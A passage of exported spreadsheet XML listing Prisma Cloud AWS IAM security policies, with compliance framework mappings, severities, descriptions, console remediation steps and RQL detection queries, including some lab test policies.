      <c r="AE1960" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1960" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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testrule - Notifications:, AccountGroups:test;, testrule2 - Notifications:, AccountGroups:Default Account Group,jmontufar.org - 604739746859,mclayton-test,AWS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1960" t="inlineStr">
        <is>
          <t>74225f91-6def-49b7-bb8d-1762c698f3ac</t>
        </is>
      </c>
      <c r="AI1960" t="inlineStr">
        <is>
          <t>c553df26-a810-4488-a9f0-b3dda6845929</t>
        </is>
      </c>
      <c r="AJ1960" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1960" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1961">
      <c r="A1961" t="inlineStr"/>
      <c r="B1961" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C1961" s="2" t="inlineStr"/>
      <c r="D1961" t="n">
        <v>0</v>
      </c>
      <c r="E1961" t="n">
        <v>94</v>
      </c>
      <c r="F1961" t="n">
        <v>0</v>
      </c>
      <c r="G1961" t="b">
        <v>1</v>
      </c>
      <c r="H19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61" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1961" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1961" t="inlineStr">
        <is>
          <t>Test GD</t>
        </is>
      </c>
      <c r="L1961" t="inlineStr"/>
      <c r="M1961" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1961" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1961" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1961" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1961" t="inlineStr"/>
      <c r="R1961" t="inlineStr"/>
      <c r="S1961" t="inlineStr"/>
      <c r="T1961" t="b">
        <v>0</v>
      </c>
      <c r="U1961" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1961" t="inlineStr">
        <is>
          <t>aws-iam-list-access-keys</t>
        </is>
      </c>
      <c r="W1961" t="inlineStr"/>
      <c r="X1961" t="inlineStr"/>
      <c r="Y1961" t="inlineStr"/>
      <c r="Z1961" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-iam-list-access-keys' AND json.rule = status exists AND finding.source IN ( 'AWS Guard Duty' )</t>
        </is>
      </c>
      <c r="AA1961" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB1961" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1961" t="inlineStr"/>
      <c r="AD1961" t="b">
        <v>0</v>
      </c>
      <c r="AE1961" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1961" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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61" t="inlineStr">
        <is>
          <t>99bec17b-4a77-4ff2-a043-9c2f49b71dc7</t>
        </is>
      </c>
      <c r="AI1961" t="inlineStr">
        <is>
          <t>ec10f881-9e13-4332-a3a4-c9a594c7c6c7</t>
        </is>
      </c>
      <c r="AJ1961" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1961" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1962">
      <c r="A1962" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, APRA (CPS 234) Information Security, ISO 27002:2022, Matt's ATT&amp;ACK, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, RBI Baseline Cyber Security and Resilience Requirements, Demo_Daryl ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, ISO 27002:2022, MITRE ATT&amp;CK v6.3 [Deprecated], ISO/IEC 27002:2013, NIST CSF v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), CIS Controls v8.1, ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, ISO 27002:2022, ISO/IEC 27002:2013, NIST SP 800-172, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST SP 800-171 Revision 3, CIS Controls v8.1, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, TX-RAMP Level 2, ITSG-33, ISO/IEC 27018:2019, kashan ACSC Information Security Manual (ISM), CyberSecurity Law of the People's Republic of China, CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Insurance Regulatory And Development Authority Of India, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, NIST SP 800-171 Revision 2, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v12, Sarbanes Oxley Act (SOX), PCI DSS v3.2.1, Copy of CIS Controls v8, CRI Profile v1.2.1, Risk Management in Technology (RMiT), CIS Controls v8, CIS Controls v8, MLPS 2.0 (Level 2), MLPS 2.0, CRI Profile v2.0, ISO/IEC 27002:2013, MITRE ATT&amp;CK v10.0 [Deprecated], NYDFS 23 CRR-NY 500.0, ISO/IEC 27017:2015, CSA CCM v.4.0.1, Australian Cyber Security Centre (ACSC) Essential Eight, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.1.02, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CSA CCM v.4.0.1, AWS Well-Architected Framework, HITRUST CSF v.11.2.0, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27001:2022, ISO 27002:2022, Copy of CIS Controls v8, ISO/IEC 27018:2019, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, HITRUST CSF v.9.6.0, ISO/IEC 27002:2013, CIS Controls v8.1, MLPS 2.0 (Level 3), Demo_Daryl ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, CSA CCM v.4.0.1, Brazilian Data Protection Law (LGPD), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27002:2013, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), FFIEC, PCI DSS v3.2.1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B1962" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1962" s="2" t="inlineStr"/>
      <c r="D1962" t="inlineStr"/>
      <c r="E1962" t="inlineStr"/>
      <c r="F1962" t="inlineStr"/>
      <c r="G1962" t="b">
        <v>1</v>
      </c>
      <c r="H19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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1962" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1962" t="inlineStr">
        <is>
          <t>AWS IAM deprecated managed policies in use by User</t>
        </is>
      </c>
      <c r="L1962" t="inlineStr">
        <is>
          <t>UNUSED_PRIVILEGES</t>
        </is>
      </c>
      <c r="M1962" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1962" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1962" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1962" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1962" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R1962" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S1962" t="inlineStr">
        <is>
          <t>Identity Misconfiguration,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1962" t="b">
        <v>0</v>
      </c>
      <c r="U1962" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1962" t="inlineStr">
        <is>
          <t>aws-iam-list-attached-user-policies</t>
        </is>
      </c>
      <c r="W1962" t="inlineStr">
        <is>
          <t>This policy checks for any usage of deprecated AWS IAM managed policies and returns an alert if it finds one in your cloud resources.
When AWS deprecate an IAM managed policy, a new alternative is released with improved access restrictions. Existing IAM users and roles can continue to use the previous policy without interruption, however new IAM users and roles will use the new replacement policy.
Before you migrate any user or role to the new replacement policy, we recommend you review their differences in the Policy section of AWS IAM console. If you require one or more of the removed permissions, please add them separately to any user or role.
List of deprecated AWS IAM managed policies:
AmazonElasticTranscoderFullAccess (replaced by AmazonElasticTranscoder_FullAccess)</t>
        </is>
      </c>
      <c r="X1962" t="inlineStr">
        <is>
          <t>1. Go to the AWS console IAM dashboard.
2. Click Policies on the left navigation menu.
3. Enter the deprecated IAM policy name into the filter.
4. Click on the policy name.
5. Select the Policy usage tab.
6. Check all attached users, make note of them, then select Detach.
7. Click Policies on the left navigation menu.
8. Enter the new IAM policy name into the filter.
9. Click on the policy name.
10. Select the Policy usage tab.
11. Select Attach and check all the users you made a note of.
12. Click Attach policy.</t>
        </is>
      </c>
      <c r="Y1962" t="inlineStr"/>
      <c r="Z1962" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-iam-list-attached-user-policies' AND json.rule = attachedPolicies[*].policyArn contains "arn:aws:iam::aws:policy/AmazonElasticTranscoderFullAccess"</t>
        </is>
      </c>
      <c r="AA1962" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1962" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1962" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-293</t>
        </is>
      </c>
      <c r="AD1962" t="b">
        <v>1</v>
      </c>
      <c r="AE1962" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1962" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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2" t="inlineStr">
        <is>
          <t>4d39fd5d-b4c9-414b-b95b-d465d2e38540</t>
        </is>
      </c>
      <c r="AI1962" t="inlineStr">
        <is>
          <t>0b684ee4-9ee6-44b7-b197-172a2aa5b430</t>
        </is>
      </c>
      <c r="AJ1962" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1962" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1963">
      <c r="A1963" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, SOC 2, ITSG-33, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B1963" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1963" s="2" t="inlineStr"/>
      <c r="D1963" t="inlineStr"/>
      <c r="E1963" t="inlineStr"/>
      <c r="F1963" t="inlineStr"/>
      <c r="G1963" t="b">
        <v>1</v>
      </c>
      <c r="H19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963" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1963" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1963" t="inlineStr">
        <is>
          <t>AWS IAM group not in use</t>
        </is>
      </c>
      <c r="L1963" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1963" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1963" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1963" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1963" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1963" t="inlineStr">
        <is>
          <t>AC</t>
        </is>
      </c>
      <c r="R1963" t="inlineStr">
        <is>
          <t>Account Management | Automated System Account Management</t>
        </is>
      </c>
      <c r="S1963" t="inlineStr"/>
      <c r="T1963" t="b">
        <v>0</v>
      </c>
      <c r="U1963" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1963" t="inlineStr">
        <is>
          <t>aws-iam-list-groups</t>
        </is>
      </c>
      <c r="W1963" t="inlineStr">
        <is>
          <t>This policy identifies AWS IAM groups that are not actively in use. 
An AWS IAM group is a collection of IAM users managed together, allowing for unified permission assignment. These groups, if not assigned any users, pose a potential security risk if left unmanaged and can inadvertently grant unauthorized access to AWS services and resources. 
It is recommended to review and remove any unused IAM groups to prevent attaching unauthorized IAM users.</t>
        </is>
      </c>
      <c r="X1963" t="inlineStr">
        <is>
          <t>To delete an IAM user group (console)
1. Sign in to the AWS Management Console
2. Navigate to the 'Services' menu and, within the 'Security, Identity, &amp; Compliance' category, choose the 'IAM' service to open the IAM console
3. In the IAM console's navigation pane, select 'User groups' located under the 'Access management' section
4. In the list of user groups, select the check box next to the name of the reported user group to delete. You can use the search box to filter the list of user group name.
5. Choose 'Delete' to delete the group
6. In the confirmation box, If you want to delete user groups, type 'delete' and choose 'Delete' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/ensure-that-iam-groups-include-at-least-one-iam-user
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/ensure-that-iam-groups-include-at-least-one-iam-user</t>
        </is>
      </c>
      <c r="Y1963" t="inlineStr"/>
      <c r="Z1963" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-iam-list-groups' as X; config from cloud.resource where api.name = 'aws-iam-list-users' as Y; filter ' not ($.Y.groupList[*] intersects  $.X.groupName)'; show X;
{"category":"IAM","resourceTypes":["aws_iam_group","aws_iam_group_membership"]}</t>
        </is>
      </c>
      <c r="AA1963" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1963" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1963" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-1206-CKV2_AWS_14</t>
        </is>
      </c>
      <c r="AD1963" t="b">
        <v>1</v>
      </c>
      <c r="AE1963" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1963" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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63" t="inlineStr">
        <is>
          <t>e26d4612-a17e-4990-bc50-b9a07ad361f0</t>
        </is>
      </c>
      <c r="AI1963" t="inlineStr">
        <is>
          <t>883ccbd6-674c-477b-b5a7-1e909fa61b1f</t>
        </is>
      </c>
      <c r="AJ1963" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1963" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1964">
      <c r="A1964" t="inlineStr"/>
      <c r="B1964" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1964" s="2" t="inlineStr"/>
      <c r="D1964" t="inlineStr"/>
      <c r="E1964" t="inlineStr"/>
      <c r="F1964" t="inlineStr"/>
      <c r="G1964" t="b">
        <v>0</v>
      </c>
      <c r="H19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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1964" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1964" t="inlineStr">
        <is>
          <t>DM_TEST</t>
        </is>
      </c>
      <c r="L1964" t="inlineStr"/>
      <c r="M1964" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1964" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1964" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1964" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1964" t="inlineStr"/>
      <c r="R1964" t="inlineStr"/>
      <c r="S1964" t="inlineStr">
        <is>
          <t>CIS</t>
        </is>
      </c>
      <c r="T1964" t="b">
        <v>0</v>
      </c>
      <c r="U1964" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1964" t="inlineStr">
        <is>
          <t>aws-iam-list-mfa-devices</t>
        </is>
      </c>
      <c r="W1964" t="inlineStr">
        <is>
          <t>DM_TEST</t>
        </is>
      </c>
      <c r="X1964" t="inlineStr"/>
      <c r="Y1964" t="inlineStr"/>
      <c r="Z1964" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-iam-list-mfa-devices' AND json.rule = enableDate does not exist</t>
        </is>
      </c>
      <c r="AA1964" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1964" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1964" t="inlineStr"/>
      <c r="AD1964" t="b">
        <v>0</v>
      </c>
      <c r="AE1964" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1964" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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4" t="inlineStr">
        <is>
          <t>01804d42-ce27-4861-8e2a-1b3410819f15</t>
        </is>
      </c>
      <c r="AI1964" t="inlineStr">
        <is>
          <t>121d6047-305c-43b3-b813-1ac68abad9f7</t>
        </is>
      </c>
      <c r="AJ1964" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1964" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1965">
      <c r="A1965" t="inlineStr">
        <is>
          <t>CIS v1.0.0 (GCP), NIST 800-171 Rev1</t>
        </is>
      </c>
      <c r="B1965" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1965" s="2" t="inlineStr"/>
      <c r="D1965" t="inlineStr"/>
      <c r="E1965" t="inlineStr"/>
      <c r="F1965" t="inlineStr"/>
      <c r="G1965" t="b">
        <v>0</v>
      </c>
      <c r="H19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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1965" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1965" t="inlineStr">
        <is>
          <t>tadenugba IAM Policy</t>
        </is>
      </c>
      <c r="L1965" t="inlineStr"/>
      <c r="M1965" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1965" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1965" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1965" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1965" t="inlineStr">
        <is>
          <t>3.2</t>
        </is>
      </c>
      <c r="R1965" t="inlineStr">
        <is>
          <t>3.2.1</t>
        </is>
      </c>
      <c r="S1965" t="inlineStr">
        <is>
          <t>tadenugba_label</t>
        </is>
      </c>
      <c r="T1965" t="b">
        <v>0</v>
      </c>
      <c r="U1965" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1965" t="inlineStr">
        <is>
          <t>aws-iam-list-roles</t>
        </is>
      </c>
      <c r="W1965" t="inlineStr">
        <is>
          <t>AWS IAM Roles with Administrator Access Permissions test policy</t>
        </is>
      </c>
      <c r="X1965" t="inlineStr"/>
      <c r="Y1965" t="inlineStr"/>
      <c r="Z1965" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-iam-list-roles' AND json.rule = role.roleName exists and role.roleName does not contain Admin and role.roleName does not contain Organization and role.roleName does not contain AWS and role.roleName does not contain cdk as X; config from cloud.resource where api.name = 'aws-iam-get-policy-version' as Y; filter "($.X.inlinePolicies[*].policyDocument.Statement[?(@.Effect=='Allow' &amp;&amp; @.Resource=='*')].Action any equal *) or ($.X.attachedPolicies[*].policyArn contains $.Y.policyArn and $.Y.document.Statement[?(@.Effect=='Allow' &amp;&amp; @.Resource=='*')].Action any equal *)"; show X;</t>
        </is>
      </c>
      <c r="AA1965" t="inlineStr">
        <is>
          <t>Tunde Adenugba</t>
        </is>
      </c>
      <c r="AB1965" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1965" t="inlineStr"/>
      <c r="AD1965" t="b">
        <v>0</v>
      </c>
      <c r="AE1965" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1965" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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5" t="inlineStr">
        <is>
          <t>e3ac1d3e-c02e-466c-a495-878dbbe1f1b8</t>
        </is>
      </c>
      <c r="AI1965" t="inlineStr">
        <is>
          <t>11909e48-a058-463b-9872-128336ab95e0</t>
        </is>
      </c>
      <c r="AJ1965" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1965" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1966">
      <c r="A1966" t="inlineStr">
        <is>
          <t>DM_TEST_ONE</t>
        </is>
      </c>
      <c r="B1966" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1966" s="2" t="inlineStr"/>
      <c r="D1966" t="inlineStr"/>
      <c r="E1966" t="inlineStr"/>
      <c r="F1966" t="inlineStr"/>
      <c r="G1966" t="b">
        <v>0</v>
      </c>
      <c r="H19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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1966" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1966" t="inlineStr">
        <is>
          <t>DM_TEST1</t>
        </is>
      </c>
      <c r="L1966" t="inlineStr"/>
      <c r="M1966" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1966" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1966" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1966" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1966" t="inlineStr">
        <is>
          <t>Identity</t>
        </is>
      </c>
      <c r="R1966" t="inlineStr">
        <is>
          <t>MFA</t>
        </is>
      </c>
      <c r="S1966" t="inlineStr"/>
      <c r="T1966" t="b">
        <v>0</v>
      </c>
      <c r="U1966" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1966" t="inlineStr">
        <is>
          <t>aws-iam-list-roles</t>
        </is>
      </c>
      <c r="W1966" t="inlineStr">
        <is>
          <t>DM_TEST</t>
        </is>
      </c>
      <c r="X1966" t="inlineStr"/>
      <c r="Y1966" t="inlineStr"/>
      <c r="Z1966" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-iam-list-roles' AND json.rule = role.assumeRolePolicyDocument exists</t>
        </is>
      </c>
      <c r="AA1966" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1966" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1966" t="inlineStr"/>
      <c r="AD1966" t="b">
        <v>0</v>
      </c>
      <c r="AE1966" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1966" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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6" t="inlineStr">
        <is>
          <t>c15e1914-defc-4c01-9ee1-41f7e3dd6be9</t>
        </is>
      </c>
      <c r="AI1966" t="inlineStr">
        <is>
          <t>e6f43a45-3347-4e7b-9cc4-ff5e53c7dc91</t>
        </is>
      </c>
      <c r="AJ1966" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1966" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1967">
      <c r="A1967" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, APRA (CPS 234) Information Security, ISO 27002:2022, HIPAA, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, RBI Baseline Cyber Security and Resilience Requirements, Demo_Daryl ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, ACSC Information Security Manual (ISM), Microsoft Cloud Security Benchmark v1, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, NIST CSF v2.0, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), CIS Controls v8.1, ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, ISO 27002:2022, ISO/IEC 27002:2013, NIST SP 800-172, TX-RAMP Level 2, Telecommunications Security Act - TSA, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST CSF v.11.2.0, NIST SP 800-171 Revision 3, CIS Controls v8.1, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, ITSG-33, ISO/IEC 27018:2019, CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, APRA (CPS 234) Information Security, Insurance Regulatory And Development Authority Of India, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, NIST SP 800-171 Revision 2, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Sarbanes Oxley Act (SOX), PCI DSS v3.2.1, Copy of CIS Controls v8, CRI Profile v1.2.1, Risk Management in Technology (RMiT), NIST CSF v2.0, CIS Controls v8, CIS Controls v8, MLPS 2.0 (Level 2), CRI Profile v2.0, ISO/IEC 27002:2013, TX-RAMP Level 2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v2.0, SOC 2, Australian Cyber Security Centre (ACSC) Essential Eight, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CSA CCM v.4.0.1, NIST CSF v2.0, AWS Well-Architected Framework, APRA (CPS 234) Information Security, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27001:2022, TX-RAMP Level 1, ITSG-33, ISO 27002:2022, Copy of CIS Controls v8, ISO/IEC 27018:2019, CSA CCM v.4.0.1, TX-RAMP Level 2, HITRUST CSF v.9.6.0, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, CIS Controls v8.1, CSA CCM v4.0.12, Demo_Daryl ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, NIST 800-53 Rev 5, CSA CCM v.4.0.1, Copy of ACSC Information Security Manual (ISM)-clone, NIST 800-53 Rev 5, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), FFIEC, NIST 800-53 Rev 5, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, PCI DSS v3.2.1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
